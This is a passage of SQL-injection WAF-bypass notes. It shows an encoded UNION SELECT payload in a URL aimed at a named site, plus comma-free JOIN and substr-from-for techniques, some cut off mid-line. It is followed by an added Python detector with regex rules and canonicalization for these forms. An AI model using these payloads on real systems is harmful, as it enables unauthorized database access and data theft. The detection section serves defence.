The WAF filters keywords such as union, select and from.
1. List all tables in the current database
http://jyht.co.uk/career.php?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,%28%53%45%4C%45%43%54%20%47%52%4F%55%50%5F%43%4F%4E%4...
Bypassing the comma filter
Use the JOIN keyword
select id,ip from client_ip where 1>2 union select * from ((select user())a JOIN (select version())b);
Basic JOIN usage example:
Use from 1 for 1
select substr(database() from 1 for...
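From the defending side, the payloads above get through because the filter matches keywords on the raw request value. The following is an added example, not code from the original page: it canonicalizes a parameter (percent-decoding, inline comments treated as whitespace) before matching, and adds rules for the comma-free JOIN and `from N for N` forms. The rule names, function names and sample values are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Rules run against the canonical form. Names are hypothetical.
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    # Derived tables joined to build columns without a comma: (...)a join (...)b
    "comma_free_join": re.compile(r"\)\s*\w*\s+join\s+\("),
    # substr()/mid() written with FROM ... FOR instead of comma arguments
    "substr_from_for": re.compile(
        r"\b(substr|substring|mid)\s*\([^,]*?\bfrom\s+\d+\s+for\b"),
}

def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable, replace /* */ comments by spaces, lowercase."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()

def naive_filter(value: str) -> bool:
    """Keyword match on the raw value, the kind of check the page describes."""
    return bool(re.search(r"\bunion\s+select\b", value, re.I))

def matched_rules(value: str) -> list[str]:
    """Return the names of all rules that fire on the canonical form."""
    canon = canonicalize(value)
    return [name for name, rx in RULES.items() if rx.search(canon)]

# Constructed sample parameter values (shortened forms of the page's patterns).
SAMPLES = [
    "11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3",
    "1 union select * from ((select user())a JOIN (select version())b)",
    "1 and substr(database() from 1 for 1)='a'",
    "11",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_filter(s)!s:5} rules={matched_rules(s)} value={s}")
```

MySQL versioned comments (`/*! ... */`) execute their contents, so a production rule set has to inspect them rather than blank them out; parameterized queries remain the actual fix, with this kind of matching only as a detection layer.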